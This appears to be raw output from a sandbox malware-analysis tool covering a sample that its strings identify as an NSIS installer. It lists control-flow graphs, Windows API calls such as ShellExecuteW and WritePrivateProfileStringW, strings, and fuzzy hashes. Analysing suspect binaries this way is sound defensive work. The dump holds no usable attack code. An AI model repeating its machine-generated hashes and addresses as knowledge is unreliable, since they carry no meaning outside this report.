                                                                                    • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 004035C4
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                    Strings
                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                    • Null, xrefs: 004036AA
                                                                                    • soft, xrefs: 004036A1
                                                                                    • Error launching installer, xrefs: 00403603
                                                                                    • Inst, xrefs: 00403698
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                    • API String ID: 4283519449-527102705
                                                                                    • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                    • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                    • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                                                    • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(00445D80,00426576,759223A0,00000000), ref: 00404FD6
                                                                                    • lstrlenW.KERNEL32(004034E5,00445D80,00426576,759223A0,00000000), ref: 00404FE6
                                                                                    • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426576,759223A0,00000000), ref: 00404FF9
                                                                                    • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426576,759223A0,00000000), ref: 00406902
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 2740478559-0
                                                                                    • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                    • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                    • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                    • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                    APIs
                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                    • GlobalFree.KERNELBASE(00814C50), ref: 00402387
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeGloballstrcpyn
                                                                                    • String ID: 226$Exch: stack < %d elements$Pop: stack empty
                                                                                    • API String ID: 1459762280-3316903362
                                                                                    • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                    • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                    • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                    • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                    • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                    • GlobalFree.KERNELBASE(00814C50), ref: 00402387
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3376005127-0
                                                                                    • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                    • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                    • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                    • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                    • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                    • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2568930968-0
                                                                                    • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                    • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                    • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                    • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                    APIs
                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                    • String ID: 226$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                    • API String ID: 247603264-2057813906
                                                                                    • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                    • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                    • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                    • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                    APIs
                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426576,759223A0,00000000), ref: 00404FD6
                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426576,759223A0,00000000), ref: 00404FE6
                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426576,759223A0,00000000), ref: 00404FF9
                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                    Strings
                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                    • API String ID: 3156913733-2180253247
                                                                                    • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                    • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                    • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                    • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: nsa
                                                                                    • API String ID: 1716503409-2209301699
                                                                                    • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                    • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                    • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                    • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                    • String ID: HideWindow
                                                                                    • API String ID: 1249568736-780306582
                                                                                    • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                    • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                    • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                    • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                    • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                    • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                    • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
